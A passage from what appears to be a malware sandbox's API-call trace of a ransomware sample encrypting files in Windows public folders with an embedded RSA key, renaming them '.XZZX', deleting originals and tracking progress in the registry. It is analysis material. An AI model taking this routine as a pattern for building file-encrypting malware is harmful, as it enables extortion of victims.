lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x848 [0141.031] ReadFile (in: hFile=0x848, lpBuffer=0x3ce56b8, nNumberOfBytesToRead=0x116, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3ce56b8*, lpNumberOfBytesRead=0x434e418*=0x116, lpOverlapped=0x0) returned 1 [0141.031] CloseHandle (hObject=0x848) returned 1 [0141.031] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0141.032] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0141.032] SetErrorMode (uMode=0x1) returned 0x1 [0141.032] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0141.032] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf8c70) returned 1 [0141.035] CryptGenKey (in: hProv=0x3cf8c70, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11698) returned 1 [0141.318] CryptExportKey (in: hKey=0x3d11698, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0141.318] CryptExportKey (in: hKey=0x3d11698, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x434e41c | out: pbData=0x4350000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0141.318] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0141.318] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0141.318] CryptDestroyKey (hKey=0x3d11698) returned 1 [0141.318] CryptReleaseContext (hProv=0x3cf8c70, dwFlags=0x0) returned 0 [0141.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\94338BDA105A8F7E16CC5903148F73C6.XZZX" (normalized: "c:\\users\\public\\documents\\94338bda105a8f7e16cc5903148f73c6.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x854 [0141.319] WriteFile (in: hFile=0x854, lpBuffer=0x3ce56b8*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce56b8*, lpNumberOfBytesWritten=0x434e438*=0x116, lpOverlapped=0x0) returned 1 [0141.319] SetFilePointer (in: hFile=0x854, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x116 [0141.320] WriteFile (in: hFile=0x854, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0141.320] SetFilePointer (in: hFile=0x854, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11b [0141.320] WriteFile (in: hFile=0x854, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x16, lpOverlapped=0x0) returned 1 [0141.320] SetFilePointer (in: hFile=0x854, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x131 [0141.320] WriteFile (in: hFile=0x854, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0141.320] SetFilePointer (in: hFile=0x854, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x136 [0141.320] SetErrorMode (uMode=0x1) returned 0x1 [0141.320] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0141.320] OutputDebugStringW (lpOutputString="end") [0141.320] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0141.320] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0141.320] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3cf8e08) returned 1 [0141.321] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf8e08, dwCertEncodingType=0x1, pInfo=0x3cf1d30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf1d60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf1d68*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3d11698) returned 1 [0141.321] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0141.322] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0141.322] CryptEncrypt (in: hKey=0x3d11698, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0141.322] CryptEncrypt (in: hKey=0x3d11698, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf8e90*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf8e90*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0141.322] WriteFile (in: hFile=0x854, lpBuffer=0x3cf8e90*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf8e90*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0141.322] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0141.322] WriteFile (in: hFile=0x854, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0141.322] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0141.322] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0141.322] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x858) returned 0x0 [0141.323] RegQueryValueExW (in: hKey=0x858, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0xc5, lpcbData=0x434dfdc*=0x4) returned 0x0 [0141.323] RegCloseKey (hKey=0x858) returned 0x0 [0141.323] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x858) returned 0x0 [0141.323] RegSetValueExW (in: hKey=0x858, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xc6, cbData=0x4 | out: lpData=0x434dfec*=0xc6) returned 0x0 [0141.323] RegCloseKey (hKey=0x858) returned 0x0 [0141.323] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.323] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.324] CloseHandle (hObject=0x854) returned 1 [0141.324] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0141.325] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0141.325] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini")) returned 1 [0141.325] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini")) returned 0 Thread: id = 503 os_tid = 0xb3c [0141.326] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0141.326] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0141.326] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Public\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\") returned="\\\\?\\C:\\Users\\Public\\Downloads\\" [0141.326] SetErrorMode (uMode=0x1) returned 0x1 [0141.326] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0141.326] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xa03b25c6, Data2=0x9d5f, Data3=0x4f97, Data4=([0]=0x8e, [1]=0xe4, [2]=0x7d, [3]=0x85, [4]=0xe8, [5]=0x15, [6]=0xeb, [7]=0x11))) returned 0x0 [0141.326] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned 41 [0141.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0141.326] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Downloads\\BC1D727A30ED2409A03B25C6350E0851.XZZX") returned 67 [0141.326] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0141.326] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini", dwFileAttributes=0x20) returned 1 [0141.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84c [0141.327] ReadFile (in: hFile=0x84c, lpBuffer=0x3cc0ff0, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cc0ff0*, lpNumberOfBytesRead=0x420e418*=0xae, lpOverlapped=0x0) returned 1 [0141.328] CloseHandle (hObject=0x84c) returned 1 [0141.328] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0141.328] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0141.328] SetErrorMode (uMode=0x1) returned 0x1 [0141.329] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0141.329] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x4378d10) returned 1 [0141.332] CryptGenKey (in: hProv=0x4378d10, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d116d8) returned 1 [0141.549] CryptExportKey (in: hKey=0x3d116d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0141.549] CryptExportKey (in: hKey=0x3d116d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0141.549] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0141.550] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0141.550] CryptDestroyKey (hKey=0x3d116d8) returned 1 [0141.550] CryptReleaseContext (hProv=0x4378d98, dwFlags=0x0) returned 0 [0141.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\BC1D727A30ED2409A03B25C6350E0851.XZZX" (normalized: "c:\\users\\public\\downloads\\bc1d727a30ed2409a03b25c6350e0851.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x868 [0141.592] WriteFile (in: hFile=0x868, lpBuffer=0x3cc0ff0*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc0ff0*, lpNumberOfBytesWritten=0x420e438*=0xae, lpOverlapped=0x0) returned 1 [0141.592] SetFilePointer (in: hFile=0x868, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xae [0141.592] WriteFile (in: hFile=0x868, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0141.592] SetFilePointer (in: hFile=0x868, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb3 [0141.593] WriteFile (in: hFile=0x868, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x16, lpOverlapped=0x0) returned 1 [0141.593] SetFilePointer (in: hFile=0x868, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc9 [0141.593] WriteFile (in: hFile=0x868, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0141.593] SetFilePointer (in: hFile=0x868, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xce [0141.593] SetErrorMode (uMode=0x1) returned 0x1 [0141.593] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0141.593] OutputDebugStringW (lpOutputString="end") [0141.593] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0141.593] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0141.593] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x4378e20) returned 1 [0141.594] CryptImportPublicKeyInfo (in: hCryptProv=0x4378e20, dwCertEncodingType=0x1, pInfo=0x3cf22e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf2310*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf2318*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3d116d8) returned 1 [0141.594] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0141.594] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0141.594] CryptEncrypt (in: hKey=0x3d116d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0141.595] CryptEncrypt (in: hKey=0x3d116d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4378ea8*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x4378ea8*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0141.595] WriteFile (in: hFile=0x868, lpBuffer=0x4378ea8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x4378ea8*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0141.595] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0141.595] WriteFile (in: hFile=0x868, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0141.595] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0141.595] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0141.595] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x874) returned 0x0 [0141.595] RegQueryValueExW (in: hKey=0x874, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xc6, lpcbData=0x420dfdc*=0x4) returned 0x0 [0141.595] RegCloseKey (hKey=0x874) returned 0x0 [0141.595] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x874) returned 0x0 [0141.595] RegSetValueExW (in: hKey=0x874, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xc7, cbData=0x4 | out: lpData=0x420dfec*=0xc7) returned 0x0 [0141.596] RegCloseKey (hKey=0x874) returned 0x0 [0141.596] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.596] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.596] CloseHandle (hObject=0x868) returned 1 [0141.597] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0141.597] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0141.597] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini")) returned 1 [0141.598] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini")) returned 0 Thread: id = 504 os_tid = 0xb40 [0141.482] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0141.482] lstrcpyW (in: lpString1=0x434f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0141.482] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\Public\\Libraries\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\") returned="\\\\?\\C:\\Users\\Public\\Libraries\\" [0141.482] SetErrorMode (uMode=0x1) returned 0x1 [0141.482] lstrcpyW (in: lpString1=0x434f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0141.482] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x23410a46, Data2=0xf3c1, Data3=0x41f7, Data4=([0]=0xa8, [1]=0xb0, [2]=0xd7, [3]=0xfa, [4]=0x4b, [5]=0x33, [6]=0x12, [7]=0x89))) returned 0x0 [0141.482] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned 41 [0141.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0141.482] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Libraries\\50C930C63ECF303723410A464304147F.XZZX") returned 67 [0141.482] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0141.482] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini", dwFileAttributes=0x20) returned 1 [0141.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini" (normalized: "c:\\users\\public\\libraries\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x868 [0141.483] ReadFile (in: hFile=0x868, lpBuffer=0x3a4670, nNumberOfBytesToRead=0x58, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3a4670*, lpNumberOfBytesRead=0x434e418*=0x58, lpOverlapped=0x0) returned 1 [0141.484] CloseHandle (hObject=0x868) returned 1 [0141.484] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0141.484] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0141.484] SetErrorMode (uMode=0x1) returned 0x1 [0141.485] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0141.485] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x4378d98) returned 1 [0141.487] CryptGenKey (in: hProv=0x4378d98, Algid=0x1, 